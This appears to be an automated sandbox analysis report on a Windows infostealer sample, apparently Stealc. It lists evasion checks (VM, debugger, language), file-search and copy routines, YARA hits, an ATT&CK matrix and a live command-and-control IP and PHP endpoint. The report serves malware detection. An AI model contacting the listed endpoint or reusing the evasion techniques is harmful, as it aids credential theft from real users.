                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-26258
                    Source: C:\Users\user\Desktop\file.exeEvaded block: after key decisiongraph_0-27417
                    Source: C:\Users\user\Desktop\file.exeAPI coverage: 6.6 %
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0040E430
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004138B0 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_004138B0
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00414570 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,0_2_00414570
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00414910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00414910
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0040ED20
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0040BE70
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0040DE10
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004016D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_004016D0
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0040DA80
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00413EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,0_2_00413EA0
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0040F6B0
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_040AE077 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_040AE077
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_040AC0D7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_040AC0D7
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_040ADCE7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_040ADCE7
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_040AF8F1 FindFirstFileA,0_2_040AF8F1
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_040B4107 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_040B4107
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_040AF917 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_040AF917
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_040A1937 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_040A1937
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_040AE697 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_040AE697
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_040B3B17 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_040B3B17
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_040B4B77 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_040B4B77
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_040AEF87 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_040AEF87
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_040B47D7 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_040B47D7
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401160 GetSystemInfo,ExitProcess,0_2_00401160
                    Source: Amcache.hve.4.drBinary or memory string: VMware
                    Source: Amcache.hve.4.drBinary or memory string: VMware Virtual USB Mouse
                    Source: Amcache.hve.4.drBinary or memory string: vmci.syshbin
                    Source: Amcache.hve.4.drBinary or memory string: VMware, Inc.
                    Source: Amcache.hve.4.drBinary or memory string: VMware20,1hbin@
                    Source: Amcache.hve.4.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                    Source: Amcache.hve.4.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                    Source: Amcache.hve.4.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                    Source: file.exe, 00000000.00000002.2192078423.000000000252B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2192078423.00000000024DA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: Amcache.hve.4.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                    Source: Amcache.hve.4.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                    Source: Amcache.hve.4.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                    Source: Amcache.hve.4.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                    Source: Amcache.hve.4.drBinary or memory string: vmci.sys
                    Source: Amcache.hve.4.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                    Source: Amcache.hve.4.drBinary or memory string: vmci.syshbin`
                    Source: Amcache.hve.4.drBinary or memory string: \driver\vmci,\driver\pci
                    Source: Amcache.hve.4.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                    Source: file.exe, 00000000.00000002.2192054558.00000000024AE000.00000040.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware k
                    Source: Amcache.hve.4.drBinary or memory string: VMware20,1
                    Source: Amcache.hve.4.drBinary or memory string: Microsoft Hyper-V Generation Counter
                    Source: Amcache.hve.4.drBinary or memory string: NECVMWar VMware SATA CD00
                    Source: Amcache.hve.4.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                    Source: file.exe, 00000000.00000002.2192054558.00000000024AE000.00000040.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                    Source: Amcache.hve.4.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                    Source: Amcache.hve.4.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                    Source: Amcache.hve.4.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                    Source: Amcache.hve.4.drBinary or memory string: VMware PCI VMCI Bus Device
                    Source: Amcache.hve.4.drBinary or memory string: VMware VMCI Bus Device
                    Source: Amcache.hve.4.drBinary or memory string: VMware Virtual RAM
                    Source: Amcache.hve.4.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                    Source: Amcache.hve.4.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                    Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-26243
                    Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-26246
                    Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-26265
                    Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-26257
                    Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-26286
                    Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-26085
                    Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-26130
                    Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-27611
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041AD48 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0041AD48
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004045C0 VirtualProtect ?,00000004,00000100,000000000_2_004045C0
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00419860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00419860
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00419750 mov eax, dword ptr fs:[00000030h]0_2_00419750
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_024AFAD3 push dword ptr fs:[00000030h]0_2_024AFAD3
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_040A092B mov eax, dword ptr fs:[00000030h]0_2_040A092B
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_040A0D90 mov eax, dword ptr fs:[00000030h]0_2_040A0D90
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_040B99B7 mov eax, dword ptr fs:[00000030h]0_2_040B99B7
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00417850 GetProcessHeap,HeapAlloc,GetUserNameA,0_2_00417850
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041AD48 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0041AD48
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041CEEA SetUnhandledExceptionFilter,0_2_0041CEEA
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041B33A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0041B33A
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_040BD151 SetUnhandledExceptionFilter,0_2_040BD151
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_040BB5A1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_040BB5A1
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_040BAFAF memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_040BAFAF
                    Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Source: Yara matchFile source: Process Memory Space: file.exe PID: 6584, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00419600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00419600
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_040B9867 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_040B9867
                    Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00417B90
                    Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_040B7DF7
                    Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00416920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,0_2_00416920
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00417850 GetProcessHeap,HeapAlloc,GetUserNameA,0_2_00417850
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00417A30 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,0_2_00417A30
                    Source: Amcache.hve.4.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                    Source: Amcache.hve.4.drBinary or memory string: msmpeng.exe
                    Source: Amcache.hve.4.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                    Source: Amcache.hve.4.drBinary or memory string: MsMpEng.exe

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: 0.3.file.exe.40f0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.file.exe.400000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.file.exe.40a0e67.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.file.exe.400000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.file.exe.40a0e67.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.file.exe.40f0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.2192078423.00000000024DA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2190984895.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.2036702828.00000000040F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2192376340.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: file.exe PID: 6584, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Source: Yara matchFile source: 0.3.file.exe.40f0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.file.exe.400000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.file.exe.40a0e67.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.file.exe.400000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.file.exe.40a0e67.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.file.exe.40f0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.2192078423.00000000024DA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2190984895.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.2036702828.00000000040F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2192376340.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: file.exe PID: 6584, type: MEMORYSTR
                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
                    Native API
                    1
                    DLL Side-Loading
                    11
                    Process Injection
                    1
                    Masquerading
                    OS Credential Dumping2
                    System Time Discovery
                    Remote ServicesData from Local System1
                    Encrypted Channel
                    Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                    DLL Side-Loading
                    1
                    Virtualization/Sandbox Evasion
                    LSASS Memory31
                    Security Software Discovery
                    Remote Desktop ProtocolData from Removable Media2
                    Ingress Tool Transfer
                    Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                    Disable or Modify Tools
                    Security Account Manager1
                    Virtualization/Sandbox Evasion
                    SMB/Windows Admin SharesData from Network Shared Drive3
                    Non-Application Layer Protocol
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                    Process Injection
                    NTDS11
                    Process Discovery
                    Distributed Component Object ModelInput Capture13
                    Application Layer Protocol
                    Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    Deobfuscate/Decode Files or Information
                    LSA Secrets1
                    Account Discovery
                    SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
                    Obfuscated Files or Information
                    Cached Domain Credentials1
                    System Owner/User Discovery
                    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                    Software Packing
                    DCSync1
                    File and Directory Discovery
                    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                    DLL Side-Loading
                    Proc Filesystem123
                    System Information Discovery
                    Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    file.exe100%AviraHEUR/AGEN.1310247
                    file.exe100%Joe Sandbox ML
                    No Antivirus matches
                    No Antivirus matches
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    http://upx.sf.net0%URL Reputationsafe
                    http://193.233.113.184/6d687e53250c2111.php/100%Avira URL Cloudmalware
                    http://193.233.113.184100%Avira URL Cloudmalware
                    http://193.233.113.184/100%Avira URL Cloudmalware
                    http://193.233.113.184/6d687e53250c2111.php)b:100%Avira URL Cloudmalware
                    http://193.233.113.184/6d687e53250c2111.php100%Avira URL Cloudmalware
                    http://193.233.113.184/6d687e53250c2111.php5b100%Avira URL Cloudmalware
                    http://193.233.113.184/N100%Avira URL Cloudmalware
                    http://193.233.113.184/m100%Avira URL Cloudmalware
                    NameIPActiveMaliciousAntivirus DetectionReputation
                    206.23.85.13.in-addr.arpa
                    unknown
                    unknowntrue
                      unknown
                      NameMaliciousAntivirus DetectionReputation
                      http://193.233.113.184/true
                      • Avira URL Cloud: malware
                      unknown
                      http://193.233.113.184/6d687e53250c2111.phptrue
                      • Avira URL Cloud: malware
                      unknown
                      NameSourceMaliciousAntivirus DetectionReputation
                      http://193.233.113.184/Nfile.exe, 00000000.00000002.2192078423.000000000250C000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: malware
                      unknown
                      http://upx.sf.netAmcache.hve.4.drfalse
                      • URL Reputation: safe
                      unknown
                      http://193.233.113.184/6d687e53250c2111.php)b:file.exe, 00000000.00000002.2192078423.000000000250C000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: malware
                      unknown
                      http://193.233.113.184file.exe, 00000000.00000002.2192078423.00000000024DA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2191994002.000000000249E000.00000004.00000020.00020000.00000000.sdmptrue
                      • Avira URL Cloud: malware
                      unknown
                      http://193.233.113.184/6d687e53250c2111.php/file.exe, 00000000.00000002.2192078423.000000000250C000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: malware
                      unknown
                      http://193.233.113.184/mfile.exe, 00000000.00000002.2192078423.000000000250C000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: malware
                      unknown
                      http://193.233.113.184/6d687e53250c2111.php5bfile.exe, 00000000.00000002.2192078423.000000000250C000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: malware
                      unknown
                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs
                      IPDomainCountryFlagASNASN NameMalicious
                      193.233.113.184
                      unknownRussian Federation
                      20549FREE-MPEIRUtrue
                      Joe Sandbox version:41.0.0 Charoite
                      Analysis ID:1518345
                      Start date and time:2024-09-25 16:06:13 +02:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 4m 28s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of analysed new started processes analysed:8
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:file.exe
                      Detection:MAL
                      Classification:mal100.troj.evad.winEXE@2/5@1/1
                      EGA Information:
                      • Successful, ratio: 100%
                      HCA Information:
                      • Successful, ratio: 100%
                      • Number of executed functions: 24
                      • Number of non-executed functions: 166
                      Cookbook Comments:
                      • Found application associated with file extension: .exe
                      • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                      • Excluded IPs from analysis (whitelisted): 20.42.65.92
                      • Excluded domains from analysis (whitelisted): onedsblobprdeus17.eastus.cloudapp.azure.com, ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • VT rate limit hit for: file.exe
                      TimeTypeDescription
                      10:07:20API Interceptor1x Sleep call for process: WerFault.exe modified
                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      193.233.113.184file.exeGet hashmaliciousStealcBrowse
                      • 193.233.113.184/6d687e53250c2111.php
                      file.exeGet hashmaliciousStealc, VidarBrowse
                      • 193.233.113.184/6d687e53250c2111.php
                      No context
                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      FREE-MPEIRUfile.exeGet hashmaliciousStealcBrowse
                      • 193.233.113.184
                      file.exeGet hashmaliciousStealc, VidarBrowse
                      • 193.233.113.184
                      SecuriteInfo.com.Trojan.Crypt.23519.13317.exeGet hashmaliciousUnknownBrowse
                      • 193.233.121.52
                      file.exeGet hashmaliciousDCRatBrowse
                      • 193.233.115.185
                      BitTorrent-7.6.exeGet hashmaliciousUnknownBrowse
                      • 193.233.122.71
                      https://test.ambasenegal-pl.com/base.php?c=17&key=66bf6845dbd8f0d53e07b779f6ab8f38Get hashmaliciousUnknownBrowse
                      • 193.233.84.115
